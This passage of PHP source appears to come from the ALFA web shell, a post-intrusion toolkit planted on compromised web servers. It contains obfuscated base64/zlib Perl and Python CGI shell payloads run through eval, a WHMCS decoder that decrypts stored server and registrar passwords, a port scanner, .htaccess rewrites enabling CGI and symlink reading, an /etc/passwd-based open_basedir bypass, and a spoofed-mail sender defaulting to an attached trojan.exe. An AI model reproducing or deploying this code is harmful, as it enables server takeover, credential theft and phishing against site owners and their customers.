            $count = 0;
            while($row = @mysqli_fetch_array($q_tables)){
                if($sql_count){
                    $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
                    if($count_q){
                        $count = @mysqli_fetch_row($count_q);
                        $count = $count[0];
                    }
                }
                $tables[] = array("name" => $row[0], "count" => (int)$count);
            }
            echo @json_encode($tables);
        }elseif($type == "alter"){
            $db["alter"]["type"] = strtolower($db["alter"]["type"]);
            $inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")";
            $text_input = array("longtext", "text", "mediumtext", "tinytext");
            if(in_array($db["alter"]["type"], $text_input)){
                $inputs = $db["alter"]["type"];
            }
            @mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs);
            $error = @mysqli_error($conn);
            if($error){
                echo $error;
            }else{
                echo "ok";
            }
        }elseif($type == "edit" || $type == "delete" || $type == "delete_all"){
            if($type == "edit"){
                $q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = '".addslashes($db["key"])."' LIMIT 0,1");
                $row = @mysqli_fetch_assoc($q);
                if($row){
                    $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
                    $columns = array();
                    $edit_data = array();
                    while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
                        $input = array("col_type" => $row2["COLUMN_TYPE"]);
                        $row2["type"] = strtolower($row2["type"]);
                        switch($row2["type"]){
                            case "longtext": case "text": case "mediumtext": case "tinytext":
                                $input["tag"] = "textarea";
                            break;
                            case "int": case "smallint": case "bigint": case "tinyint": case "mediumint":
                                $input["tag"] = "input";
                                $input["type"] = "number";
                            break;
                            default:
                                $input["tag"] = "input";
                                $input["type"] = "text";
                        }
                        $columns[$row2["name"]] = $input;
                    }
                    foreach($row as $key => $v){
                        $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]);
                    }
                    echo @json_encode($edit_data);
                }
            }else{
                if($type == "delete_all"){
                    $rows = implode("', '", $db["rows"]);
                }else{
                    $rows = addslashes($db["key"]);
                }
                $query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN ('".$rows."')";
                @mysqli_query($conn, $query);
                $error = @mysqli_error($conn);
                if($error){
                     $status = false;
                }else{
                     $status = true;
                }
                echo @json_encode(array("status" => $status, "error" => $error, "query" => $query));
            }
        }elseif($type == "update"){
            $query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET ";
            foreach($db["data"] as $col => $val){
                $query .= "`".$col."` = '".mysqli_real_escape_string($conn, $val)."',";
            }
            $query = substr($query, 0, -1);
            $query .= "WHERE `".$db["col_key"]."` = '".$db["key"]."'";
            $res = @mysqli_query($conn, $query);
            echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
        }elseif($type == "insert"){
            $query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` ";
            foreach($db["data"] as $col => $val){
                $cols .= $col . ",";
                $vals .= "'".mysqli_real_escape_string($conn, $val)."',";
            }
            $cols = substr($cols, 0, -1);
            $vals = substr($vals, 0, -1);
            $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";
            $res = @mysqli_query($conn, $query);
            echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
        }else{
            $pages = 0;
            $title = false;
            $query = "";
            $tbl_content = '';
            $line = 0;
            $tables = array();
            $columns = array();
            if($type == "load_data"){
                $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30";
                $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`");
                $tbl_count = @mysqli_fetch_row($tbl_count_q);
                $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
                while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
                    $columns[] = $row2;
                }
                if($tbl_count[0] > 30){
                    $pages = ceil($tbl_count[0] / 30);
                }
            }elseif($type == "query"){
                $query = $db["query"];
            }elseif($type == "page"){
                $db["page"] = (int)$db["page"] - 1;
                $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"]*30).",30";
            }elseif($type == "search"){
                $search = "";
                $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL");
                foreach($db["search"] as $col => $val){
                    $search_noval_r = in_array($val["opt"], $search_noval);
                    if(empty($val["value"]) && !$search_noval_r)continue;
                    if(strstr($val["opt"], "...") || $search_noval_r){
                        $val["opt"] = str_replace("...", $val["value"], $val["opt"]);
                        $search .= $col . " " . $val["opt"] . " AND ";
                    }else{
                        $search .= $col . " " . $val["opt"] . " '".addslashes($val["value"])."' AND ";
                    }
                }
                $search .= "1=1";
                $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search;
            }
            $q_tables = @mysqli_query($conn, $query);
            if(!$q_tables){
                echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));
                return false;
            }
            $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($db["db"])."' AND TABLE_NAME = '".@addslashes($db["table"])."' AND COLUMN_KEY = 'PRI'");
            if($col_key){
                $col_key = @mysqli_fetch_row($col_key);
                $col_key = $col_key[0];
                if(!empty($col_key)){
                    $tbl_content = '
';
                }
            }else{
                $col_key = false;
            }
            while($item = @mysqli_fetch_assoc($q_tables)){
                if(!$title){
                    $tbl_content .= '';
                    if($col_key){
                        $tbl_content .= '';
                    }
                    foreach($item as $key => $value){
                        $tbl_content .= '';
                    }
                    reset($item);
                    $title=true;
                    $tbl_content .= '';
                }

                if($col_key){
                    $cacheMsg = '

';
                }
                $tbl_content .= ''.$cacheMsg;
                $line++;
                foreach($item as $key => $value){
                    if($value == null){
                        $tbl_content .= '';
                    }else{
                        $tbl_content .= '';
                }
                }
                $tbl_content .= '';
            }
            $tbl_content .= '
EditDelete'.$key.'
EditDelete
null'.nl2br(htmlspecialchars($value)).'
';
            if(!$title){
                $tbl_content = "
Table is empty...
";
            }
            echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));
        }
        @mysqli_close($conn);
    }
}
function alfaselfrm(){
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
echo(__pre().'
');
if(@unlink($GLOBALS['__file_path'])){
echo('Shell has been removed :)');
}else{
echo 'unlink error!';
}
echo('
');
}
if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
echo "
";
echo "

";
echo '

Do you want to destroy me?!
Yes';
echo '

';
}
}
function alfacgishell(){
alfahead();
$div = "";
alfaCreateParentFolder();
@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
if(!in_array($_POST['alfa1'],array('perl','py'))){
$div = "";
echo '

| CGI Shell |

| Perl | | Python | ';
}
if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
@mkdir('cgialfa',0755);
@chdir('cgialfa');
alfacgihtaccess('cgi');
$name = $_POST['alfa1'].'.alfa';
$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'\',\'exec\'))';
if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
if(__write_file($name,$code)){
@chmod($name,0755);
echo '';
}
}
echo $div;
alfafooter();
}
function alfaWhmcs(){
alfahead();
echo '
';
function decrypt($string,$cc_encryption_hash){
$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen ($hash_key);
$string = __ZGVjb2Rlcg($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string)
{
if(function_exists('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
AlfaNum(8,9,10);
echo "

| WHMCS DeCoder |

".getConfigHtml('whmcs')."


";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "

";
if($_POST['alfa5']!=''){
$db_host=($_POST['alfa7']);
$db_username=($_POST['alfa3']);
$db_password=($_POST['alfa4']);
$db_name=($_POST['alfa5']);
$cc_encryption_hash=($_POST['alfa6']);
echo __pre();
$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
$query = mysqli_query($conn,"SELECT * FROM tblservers");
$num = mysqli_num_rows($query);
if ($num > 0){
for($i=0; $i <=$num-1; $i++){
$v = @mysqli_fetch_array($query);
$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];
echo("
");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("");
echo("");
echo("");
echo("");
echo("");
echo("");
echo "
Type$type
Active$active
Hostname$hostname
Ip$ipaddress
Username$username
Password$password


";
}
$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
$num1 = @mysqli_num_rows($query1);
if ($num1 > 0){
for($i=0; $i <=$num1 -1; $i++){
$v = mysqli_fetch_array($query1);
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt($v['value'], $cc_encryption_hash);
if ($value==""){
$value=0;
}
echo("
Domain Reseller
");
echo("
");
echo("");
echo("");
echo("");
echo "
Register$registrar
Setting$setting
Value$value


";
}
}
}else{__alert('tblservers is Empty...!');};
}
echo "
";
alfafooter();
}
function alfaportscanner(){
alfahead();
echo '

| Port Scaner |




Host:

Port start:

Port end:


';
$start = strip_tags($_POST['alfa2']);
$end = strip_tags($_POST['alfa3']);
$host = strip_tags($_POST['alfa4']);
if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
echo __pre();
$packetContent = "GET / HTTP/1.1\r\n\r\n";
if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
else{
$packetContent = str_replace(array("\r","\n"), "", $packetContent);
$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
}
for($i = $start; $i<=$end; $i++){
$sock = @fsockopen($host, $i, $errno, $errstr, 3);
if($sock){
stream_set_timeout($sock, 5);
fwrite($sock, $packetContent."\r\n\r\n\x00");
$counter = 0;
$maxtry = 1;
$bin = "";
do{
$line = fgets($sock, 1024);
if(trim($line)=="")$counter++;
$bin .= $line;
}while($counter<$maxtry);
fclose($sock);
echo "

Port $i is open

";
echo "

";
}
flush();
}
}
echo '
';
alfafooter();
}
function alfacgihtaccess($m,$d='', $symname=false){
$readme = "";
if($symname){$readme="\nReadmeName ".trim($symname);}
if($m=='cgi'){
$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
}elseif($m=='sym'){
$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
}elseif($m=='shtml'){
$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
}
@__write_file($d . ".htaccess", $code);
}
function alfabasedir(){
alfahead();
echo '

| Open Base Dir |

';
$passwd = _alfa_file('/etc/passwd');
if(is_array($passwd)){
$users = array();
$makepwd = alfaMakePwd();
$basedir = @ini_get('open_basedir');
$safe_mode = @ini_get('safe_mode');
if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
$tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash);
$bash_users  = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
$users = json_decode($bash_users, true);
$x=count($users);
if($x>=2){array_pop($users);--$x;}
}
if(!$basedir&&!$safe_mode){
$x=0;
foreach($passwd as $str){
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = str_replace("{user}", $username, $makepwd);
if(($username != '')){
if (@is_readable($dirz)){
array_push($users,$username);
$x++;
}}}
}
echo '

';
echo "[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."
";
echo "[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."
";
echo "[~] Searching for passwords in config files...\n\n"."


";
foreach($users as $user){
if(empty($user))continue;
$path = str_replace("{user}", $user, $makepwd);
echo "
Change Dir ..:: $user ::..
>'>

";
}
}else{echo('
[-] Error : coudn`t read /etc/passwd [-]
');}
echo '

';
echo '
';
alfafooter();
}
function alfamail(){
alfahead();
echo '
';
AlfaNum(8,9,10);
echo '

| Fake Mail |

>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
$table = array(
'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
);
create_table($table);
echo '

Message:

';
if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
$mail_to = $_POST['alfa1'];
$mail_from = $_POST['alfa2'];
$mail_subject = $_POST['alfa3'];
$mail_content = $_POST['alfa5'];
$count_mail = (int)$_POST['alfa6'];
$mail_attach = $_POST['alfa7'];
if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
if(!empty($mail_attach)&&@is_file($mail_attach)){
$file = $mail_attach;
$content = __read_file($file);
$content = chunk_split(__ZW5jb2Rlcg($content));
$uid = md5(uniqid(time()));
$filename = basename($file);
$headers  = "From: ".$mail_from." <".$mail_from.">\r\n";
$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
$headers .= "Reply-To: ".$mail_from."\r\n";
$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
$headers .= 'MIME-Version: 1.0' . "\r\n";
$headers .= 'X-Mailer: php' . "\r\n";
$mail_content  = "--".$uid."\r\n";
$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
$mail_content .= $mail_content."\r\n\r\n";
$mail_content .= "--".$uid."\r\n";
$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
